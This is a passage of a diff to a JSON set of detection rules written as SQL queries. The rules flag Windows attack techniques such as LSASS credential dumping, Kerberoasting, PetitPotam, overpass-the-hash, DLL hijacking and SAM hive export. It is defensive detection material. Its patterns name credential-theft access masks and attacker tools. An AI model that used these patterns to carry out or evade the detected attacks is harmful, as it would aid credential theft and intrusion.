"win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos 